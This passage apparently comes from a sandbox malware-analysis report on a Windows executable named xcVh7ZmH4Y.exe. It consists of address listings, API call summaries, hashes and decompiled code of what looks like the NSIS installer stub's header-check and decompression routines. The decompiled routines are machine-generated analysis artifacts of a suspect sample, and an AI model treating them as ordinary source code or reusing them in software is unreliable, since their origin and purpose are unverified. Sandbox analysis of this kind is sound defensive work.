                                                0x00403cc6
                                                0x00403ccb
                                                0x00403cd4
                                                0x00000000
                                                0x00000000
                                                0x00403cda
                                                0x00403cdc
                                                0x00403ce9
                                                0x00403ce9
                                                0x00403cf2
                                                0x00403cf8
                                                0x00403d20
                                                0x00403d28
                                                0x00000000
                                                0x00403d0a
                                                0x00403d0b
                                                0x00403d14
                                                0x00403d1a
                                                0x00403d1b
                                                0x00000000
                                                0x00403d1b
                                                0x00403d16
                                                0x00403d18
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403d18
                                                0x00403cf8

                                                APIs
                                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F1FAA0), ref: 00403CED
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                • LoadImageW.USER32 ref: 00403D54
                                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                • RegisterClassW.USER32 ref: 00403D91
                                                • SystemParametersInfoW.USER32 ref: 00403DA9
                                                • CreateWindowExW.USER32 ref: 00403DDE
                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                • GetClassInfoW.USER32 ref: 00403E40
                                                • GetClassInfoW.USER32 ref: 00403E4D
                                                • RegisterClassW.USER32 ref: 00403E56
                                                • DialogBoxParamW.USER32 ref: 00403E75
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-4000614727
                                                • Opcode ID: 491a9edb25f473d2c824adf586226e1a0bc5785f73c6d28f930d7720a868ab83
                                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                • Opcode Fuzzy Hash: 491a9edb25f473d2c824adf586226e1a0bc5785f73c6d28f930d7720a868ab83
                                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 597 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 600 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 597->600 601 4030cd-4030d2 597->601 609 4031f0-4031fe call 403019 600->609 610 40310b 600->610 602 4032ad-4032b1 601->602 616 403200-403203 609->616 617 403253-403258 609->617 612 403110-403127 610->612 614 403129 612->614 615 40312b-403134 call 4034cf 612->615 614->615 624 40325a-403262 call 403019 615->624 625 40313a-403141 615->625 619 403205-40321d call 4034e5 call 4034cf 616->619 620 403227-403251 GlobalAlloc call 4034e5 call 4032b4 616->620 617->602 619->617 647 40321f-403225 619->647 620->617 646 403264-403275 620->646 624->617 629 403143-403157 call 405fe8 625->629 630 4031bd-4031c1 625->630 636 4031cb-4031d1 629->636 644 403159-403160 629->644 635 4031c3-4031ca call 403019 630->635 630->636 635->636 637 4031e0-4031e8 636->637 638 4031d3-4031dd call 4069f7 636->638 637->612 645 4031ee 637->645 638->637 644->636 650 403162-403169 644->650 645->609 651 403277 646->651 652 40327d-403282 646->652 647->617 647->620 650->636 653 40316b-403172 650->653 651->652 654 403283-403289 652->654 653->636 655 403174-40317b 653->655 654->654 656 40328b-4032a6 SetFilePointer call 405fe8 654->656 655->636 657 40317d-40319d 655->657 660 4032ab 656->660 657->617 659 4031a3-4031a7 657->659 661 4031a9-4031ad 659->661 662 4031af-4031b7 659->662 660->602 661->645 661->662 662->636 663 4031b9-4031bb 662->663 663->636
                                                C-Code - Quality: 80%
                                                			E0040307D(void* __eflags, signed int _a4) {
                                                				DWORD* _v8;
                                                				DWORD* _v12;
                                                				void* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				long _t43;
                                                				signed int _t50;
                                                				void* _t53;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				long _t60;
                                                				signed int _t65;
                                                				signed int _t70;
                                                				signed int _t71;
                                                				signed int _t77;
                                                				intOrPtr _t80;
                                                				long _t82;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				void* _t89;
                                                				signed int _t90;
                                                				signed int _t93;
                                                				void* _t94;
                                                
                                                				_t82 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_t43 = GetTickCount();
                                                				_t91 = L"C:\\Users\\engineer\\Desktop\\xcVh7ZmH4Y.exe";
                                                				 *0x434f0c = _t43 + 0x3e8;
                                                				GetModuleFileNameW(0, L"C:\\Users\\engineer\\Desktop\\xcVh7ZmH4Y.exe", 0x400);
                                                				_t89 = E0040602D(_t91, 0x80000000, 3);
                                                				_v16 = _t89;
                                                				 *0x40a018 = _t89;
                                                				if(_t89 == 0xffffffff) {
                                                					return L"Error launching installer";
                                                				}
                                                				E0040653D(0x441800, _t91);
                                                				E0040653D(0x444000, E00405E58(0x441800));
                                                				_t50 = GetFileSize(_t89, 0);
                                                				__eflags = _t50;
                                                				 *0x42aa24 = _t50;
                                                				_t93 = _t50;
                                                				if(_t50 <= 0) {
                                                					L24:
                                                					E00403019(1);
                                                					__eflags =  *0x434f14 - _t82;
                                                					if( *0x434f14 == _t82) {
                                                						goto L29;
                                                					}
                                                					__eflags = _v8 - _t82;
                                                					if(_v8 == _t82) {
                                                						L28:
                                                						_t34 =  &_v24; // 0x40387d
                                                						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                						_t94 = _t53;
                                                						E004034E5( *0x434f14 + 0x1c);
                                                						_t35 =  &_v24; // 0x40387d
                                                						_push( *_t35);
                                                						_push(_t94);
                                                						_push(_t82);
                                                						_push(0xffffffff); // executed
                                                						_t57 = E004032B4(); // executed
                                                						__eflags = _t57 - _v24;
                                                						if(_t57 == _v24) {
                                                							__eflags = _v44 & 0x00000001;
                                                							 *0x434f10 = _t94;
                                                							 *0x434f18 =  *_t94;
                                                							if((_v44 & 0x00000001) != 0) {
                                                								 *0x434f1c =  *0x434f1c + 1;
                                                								__eflags =  *0x434f1c;
                                                							}
                                                							_t40 = _t94 + 0x44; // 0x44
                                                							_t59 = _t40;
                                                							_t85 = 8;
                                                							do {
                                                								_t59 = _t59 - 8;
                                                								 *_t59 =  *_t59 + _t94;
                                                								_t85 = _t85 - 1;
                                                								__eflags = _t85;
                                                							} while (_t85 != 0);
                                                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                							 *(_t94 + 0x3c) = _t60;
                                                							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						goto L29;
                                                					}
                                                					E004034E5( *0x41ea18);
                                                					_t65 = E004034CF( &_a4, 4);
                                                					__eflags = _t65;
                                                					if(_t65 == 0) {
                                                						goto L29;
                                                					}
                                                					__eflags = _v12 - _a4;
                                                					if(_v12 != _a4) {
                                                						goto L29;
                                                					}
                                                					goto L28;
                                                				} else {
                                                					do {
                                                						_t90 = _t93;
                                                						asm("sbb eax, eax");
                                                						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                						__eflags = _t93 - _t70;
                                                						if(_t93 >= _t70) {
                                                							_t90 = _t70;
                                                						}
                                                						_t71 = E004034CF(0x416a18, _t90);
                                                						__eflags = _t71;
                                                						if(_t71 == 0) {
                                                							E00403019(1);
                                                							L29:
                                                							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                						}
                                                						__eflags =  *0x434f14;
                                                						if( *0x434f14 != 0) {
                                                							__eflags = _a4 & 0x00000002;
                                                							if((_a4 & 0x00000002) == 0) {
                                                								E00403019(0);
                                                							}
                                                							goto L20;
                                                						}
                                                						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                						_t77 = _v44;
                                                						__eflags = _t77 & 0xfffffff0;
                                                						if((_t77 & 0xfffffff0) != 0) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v40 - 0xdeadbeef;
                                                						if(_v40 != 0xdeadbeef) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v28 - 0x74736e49;
                                                						if(_v28 != 0x74736e49) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v32 - 0x74666f73;
                                                						if(_v32 != 0x74666f73) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v36 - 0x6c6c754e;
                                                						if(_v36 != 0x6c6c754e) {
                                                							goto L20;
                                                						}
                                                						_a4 = _a4 | _t77;
                                                						_t87 =  *0x41ea18; // 0x4ad42
                                                						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                						_t80 = _v20;
                                                						__eflags = _t80 - _t93;
                                                						 *0x434f14 = _t87;
                                                						if(_t80 > _t93) {
                                                							goto L29;
                                                						}
                                                						__eflags = _a4 & 0x00000008;
                                                						if((_a4 & 0x00000008) != 0) {
                                                							L16:
                                                							_v8 = _v8 + 1;
                                                							_t93 = _t80 - 4;
                                                							__eflags = _t90 - _t93;
                                                							if(_t90 > _t93) {
                                                								_t90 = _t93;
                                                							}
                                                							goto L20;
                                                						}
                                                						__eflags = _a4 & 0x00000004;
                                                						if((_a4 & 0x00000004) != 0) {
                                                							break;
                                                						}
                                                						goto L16;
                                                						L20:
                                                						__eflags = _t93 -  *0x42aa24; // 0x4ad46
                                                						if(__eflags < 0) {
                                                							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                						}
                                                						 *0x41ea18 =  *0x41ea18 + _t90;
                                                						_t93 = _t93 - _t90;
                                                						__eflags = _t93;
                                                					} while (_t93 != 0);
                                                					_t82 = 0;
                                                					__eflags = 0;
                                                					goto L24;
                                                				}
                                                			}































                                                0x00403085
                                                0x00403088
                                                0x0040308b
                                                0x0040308e
                                                0x00403094
                                                0x004030a5
                                                0x004030aa
                                                0x004030bd
                                                0x004030c2
                                                0x004030c5
                                                0x004030cb
                                                0x00000000
                                                0x004030cd
                                                0x004030de
                                                0x004030ef
                                                0x004030f6
                                                0x004030fc
                                                0x004030fe
                                                0x00403103
                                                0x00403105
                                                0x004031f0
                                                0x004031f2
                                                0x004031f7
                                                0x004031fe
                                                0x00000000
                                                0x00000000
                                                0x00403200
                                                0x00403203
                                                0x00403227
                                                0x00403227
                                                0x0040322c
                                                0x00403232
                                                0x0040323d
                                                0x00403242
                                                0x00403242
                                                0x00403245
                                                0x00403246
                                                0x00403247
                                                0x00403249
                                                0x0040324e
                                                0x00403251
                                                0x00403264
                                                0x00403268
                                                0x00403270
                                                0x00403275
                                                0x00403277
                                                0x00403277
                                                0x00403277
                                                0x0040327f
                                                0x0040327f
                                                0x00403282
                                                0x00403283
                                                0x00403283
                                                0x00403286
                                                0x00403288
                                                0x00403288
                                                0x00403288
                                                0x00403292
                                                0x00403298
                                                0x004032a6
                                                0x004032ab
                                                0x00000000
                                                0x004032ab
                                                0x00000000
                                                0x00403251
                                                0x0040320b
                                                0x00403216
                                                0x0040321b
                                                0x0040321d
                                                0x00000000
                                                0x00000000
                                                0x00403222
                                                0x00403225
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040310b
                                                0x00403110
                                                0x00403115
                                                0x00403119
                                                0x00403120
                                                0x00403125
                                                0x00403127
                                                0x00403129
                                                0x00403129
                                                0x0040312d
                                                0x00403132
                                                0x00403134
                                                0x0040325c
                                                0x00403253
                                                0x00000000
                                                0x00403253
                                                0x0040313a
                                                0x00403141
                                                0x004031bd
                                                0x004031c1
                                                0x004031c5
                                                0x004031ca
                                                0x00000000
                                                0x004031c1
                                                0x0040314a
                                                0x0040314f
                                                0x00403152
                                                0x00403157
                                                0x00000000
                                                0x00000000
                                                0x00403159
                                                0x00403160
                                                0x00000000
                                                0x00000000
                                                0x00403162
                                                0x00403169
                                                0x00000000
                                                0x00000000
                                                0x0040316b
                                                0x00403172
                                                0x00000000
                                                0x00000000
                                                0x00403174
                                                0x0040317b
                                                0x00000000
                                                0x00000000
                                                0x0040317d
                                                0x00403183
                                                0x0040318c
                                                0x00403192
                                                0x00403195
                                                0x00403197
                                                0x0040319d
                                                0x00000000
                                                0x00000000
                                                0x004031a3
                                                0x004031a7
                                                0x004031af
                                                0x004031af
                                                0x004031b2
                                                0x004031b5
                                                0x004031b7
                                                0x004031b9
                                                0x004031b9
                                                0x00000000
                                                0x004031b7
                                                0x004031a9
                                                0x004031ad
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031cb
                                                0x004031cb
                                                0x004031d1
                                                0x004031dd
                                                0x004031dd
                                                0x004031e0
                                                0x004031e6
                                                0x004031e6
                                                0x004031e6
                                                0x004031ee
                                                0x004031ee
                                                0x00000000
                                                0x004031ee

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0040308E
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNEL32(00000003,004030BD,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                  • Part of subcall function 0040602D: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                • GlobalAlloc.KERNEL32(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\xcVh7ZmH4Y.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                • API String ID: 2803837635-565338649
                                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 728 4032b4-4032cb 729 4032d4-4032dd 728->729 730 4032cd 728->730 731 4032e6-4032eb 729->731 732 4032df 729->732 730->729 733 4032fb-403308 call 4034cf 731->733 734 4032ed-4032f6 call 4034e5 731->734 732->731 738 4034bd 733->738 739 40330e-403312 733->739 734->733 740 4034bf-4034c0 738->740 741 403468-40346a 739->741 742 403318-403361 GetTickCount 739->742 743 4034c8-4034cc 740->743 746 4034aa-4034ad 741->746 747 40346c-40346f 741->747 744 4034c5 742->744 745 403367-40336f 742->745 744->743 748 403371 745->748 749 403374-403382 call 4034cf 745->749 750 4034b2-4034bb call 4034cf 746->750 751 4034af 746->751 747->744 752 403471 747->752 748->749 749->738 761 403388-403391 749->761 750->738 762 4034c2 750->762 751->750 753 403474-40347a 752->753 756 40347c 753->756 757 40347e-40348c call 4034cf 753->757 756->757 757->738 765 40348e-40349a call 4060df 757->765 764 403397-4033b7 call 406a65 761->764 762->744 770 403460-403462 764->770 771 4033bd-4033d0 GetTickCount 764->771 772 403464-403466 765->772 773 40349c-4034a6 765->773 770->740 774 4033d2-4033da 771->774 775 40341b-40341d 771->775 772->740 773->753 778 4034a8 773->778 779 4033e2-403413 MulDiv wsprintfW call 40559f 774->779 780 4033dc-4033e0 774->780 776 403454-403458 775->776 777 40341f-403423 775->777 776->745 783 40345e 776->783 781 403425-40342c call 4060df 777->781 782 40343a-403445 777->782 778->744 787 403418 779->787 780->775 780->779 788 403431-403433 781->788 786 403448-40344c 782->786 783->744 786->764 789 403452 786->789 787->775 788->772 790 403435-403438 788->790 789->744 790->786
                                                C-Code - Quality: 95%
                                                			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                				signed int _v8;
                                                				int _v12;
                                                				intOrPtr _v16;
                                                				long _v20;
                                                				intOrPtr _v24;
                                                				short _v152;
                                                				void* _t65;
                                                				long _t70;
                                                				intOrPtr _t75;
                                                				long _t76;
                                                				void* _t78;
                                                				int _t88;
                                                				intOrPtr _t92;
                                                				intOrPtr _t95;
                                                				long _t96;
                                                				signed int _t97;
                                                				int _t98;
                                                				int _t99;
                                                				void* _t101;
                                                				void* _t102;
                                                
                                                				_t97 = _a16;
                                                				_t92 = _a12;
                                                				_v12 = _t97;
                                                				if(_t92 == 0) {
                                                					_v12 = 0x8000;
                                                				}
                                                				_v8 = _v8 & 0x00000000;
                                                				_v16 = _t92;
                                                				if(_t92 == 0) {
                                                					_v16 = 0x422a20;
                                                				}
                                                				_t62 = _a4;
                                                				if(_a4 >= 0) {
                                                					E004034E5( *0x434f58 + _t62);
                                                				}
                                                				if(E004034CF( &_a16, 4) == 0) {
                                                					L41:
                                                					_push(0xfffffffd);
                                                					goto L42;
                                                				} else {
                                                					if((_a19 & 0x00000080) == 0) {
                                                						if(_t92 != 0) {
                                                							if(_a16 < _t97) {
                                                								_t97 = _a16;
                                                							}
                                                							if(E004034CF(_t92, _t97) != 0) {
                                                								_v8 = _t97;
                                                								L44:
                                                								return _v8;
                                                							} else {
                                                								goto L41;
                                                							}
                                                						}
                                                						if(_a16 <= _t92) {
                                                							goto L44;
                                                						}
                                                						_t88 = _v12;
                                                						while(1) {
                                                							_t98 = _a16;
                                                							if(_a16 >= _t88) {
                                                								_t98 = _t88;
                                                							}
                                                							if(E004034CF(0x41ea20, _t98) == 0) {
                                                								goto L41;
                                                							}
                                                							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                                                								L28:
                                                								_push(0xfffffffe);
                                                								L42:
                                                								_pop(_t65);
                                                								return _t65;
                                                							}
                                                							_v8 = _v8 + _t98;
                                                							_a16 = _a16 - _t98;
                                                							if(_a16 > 0) {
                                                								continue;
                                                							}
                                                							goto L44;
                                                						}
                                                						goto L41;
                                                					}
                                                					_t70 = GetTickCount();
                                                					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                					_t14 =  &_a16;
                                                					 *_t14 = _a16 & 0x7fffffff;
                                                					_v20 = _t70;
                                                					 *0x40ce68 = 8;
                                                					 *0x416a10 = 0x40ea08;
                                                					 *0x416a0c = 0x40ea08;
                                                					 *0x416a08 = 0x416a08;
                                                					_a4 = _a16;
                                                					if( *_t14 <= 0) {
                                                						goto L44;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					while(1) {
                                                						L9:
                                                						_t99 = 0x4000;
                                                						if(_a16 < 0x4000) {
                                                							_t99 = _a16;
                                                						}
                                                						if(E004034CF(0x41ea20, _t99) == 0) {
                                                							goto L41;
                                                						}
                                                						_a16 = _a16 - _t99;
                                                						 *0x40ce58 = 0x41ea20;
                                                						 *0x40ce5c = _t99;
                                                						while(1) {
                                                							_t95 = _v16;
                                                							 *0x40ce60 = _t95;
                                                							 *0x40ce64 = _v12;
                                                							_t75 = E00406A65(0x40ce58);
                                                							_v24 = _t75;
                                                							if(_t75 < 0) {
                                                								break;
                                                							}
                                                							_t101 =  *0x40ce60 - _t95;
                                                							_t76 = GetTickCount();
                                                							_t96 = _t76;
                                                							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                								_t102 = _t102 + 0xc;
                                                								E0040559F(0,  &_v152); // executed
                                                								_v20 = _t96;
                                                							}
                                                							if(_t101 == 0) {
                                                								if(_a16 > 0) {
                                                									goto L9;
                                                								}
                                                								goto L44;
                                                							} else {
                                                								if(_a12 != 0) {
                                                									_v8 = _v8 + _t101;
                                                									_v12 = _v12 - _t101;
                                                									_v16 =  *0x40ce60;
                                                									L23:
                                                									if(_v24 != 1) {
                                                										continue;
                                                									}
                                                									goto L44;
                                                								}
                                                								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                								if(_t78 == 0) {
                                                									goto L28;
                                                								}
                                                								_v8 = _v8 + _t101;
                                                								goto L23;
                                                							}
                                                						}
                                                						_push(0xfffffffc);
                                                						goto L42;
                                                					}
                                                					goto L41;
                                                				}
                                                			}























                                                0x004032bf
                                                0x004032c3
                                                0x004032c6
                                                0x004032cb
                                                0x004032cd
                                                0x004032cd
                                                0x004032d4
                                                0x004032d8
                                                0x004032dd
                                                0x004032df
                                                0x004032df
                                                0x004032e6
                                                0x004032eb
                                                0x004032f6
                                                0x004032f6
                                                0x00403308
                                                0x004034bd
                                                0x004034bd
                                                0x00000000
                                                0x0040330e
                                                0x00403312
                                                0x0040346a
                                                0x004034ad
                                                0x004034af
                                                0x004034af
                                                0x004034bb
                                                0x004034c2
                                                0x004034c5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004034bb
                                                0x0040346f
                                                0x00000000
                                                0x00000000
                                                0x00403471
                                                0x00403474
                                                0x00403477
                                                0x0040347a
                                                0x0040347c
                                                0x0040347c
                                                0x0040348c
                                                0x00000000
                                                0x00000000
                                                0x0040349a
                                                0x00403464
                                                0x00403464
                                                0x004034bf
                                                0x004034bf
                                                0x00000000
                                                0x004034bf
                                                0x0040349c
                                                0x0040349f
                                                0x004034a6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004034a8
                                                0x00000000
                                                0x00403474
                                                0x0040331e
                                                0x00403320
                                                0x00403327
                                                0x0040332e
                                                0x0040332e
                                                0x00403335
                                                0x0040333d
                                                0x00403347
                                                0x0040334c
                                                0x00403354
                                                0x0040335e
                                                0x00403361
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403367
                                                0x00403367
                                                0x00403367
                                                0x0040336f
                                                0x00403371
                                                0x00403371
                                                0x00403382
                                                0x00000000
                                                0x00000000
                                                0x00403388
                                                0x0040338b
                                                0x00403391
                                                0x00403397
                                                0x00403397
                                                0x004033a2
                                                0x004033a8
                                                0x004033ad
                                                0x004033b4
                                                0x004033b7
                                                0x00000000
                                                0x00000000
                                                0x004033c3
                                                0x004033c5
                                                0x004033ce
                                                0x004033d0
                                                0x00403401
                                                0x00403407
                                                0x00403413
                                                0x00403418
                                                0x00403418
                                                0x0040341d
                                                0x00403458
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040341f
                                                0x00403423
                                                0x0040343f
                                                0x00403442
                                                0x00403445
                                                0x00403448
                                                0x0040344c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403452
                                                0x0040342c
                                                0x00403433
                                                0x00000000
                                                0x00000000
                                                0x00403435
                                                0x00000000
                                                0x00403435
                                                0x0040341d
                                                0x00403460
                                                0x00000000
                                                0x00403460
                                                0x00000000
                                                0x00403367

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: *B$ A$ A$... %d%%$}8@
                                                • API String ID: 551687249-3029848762
                                                • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
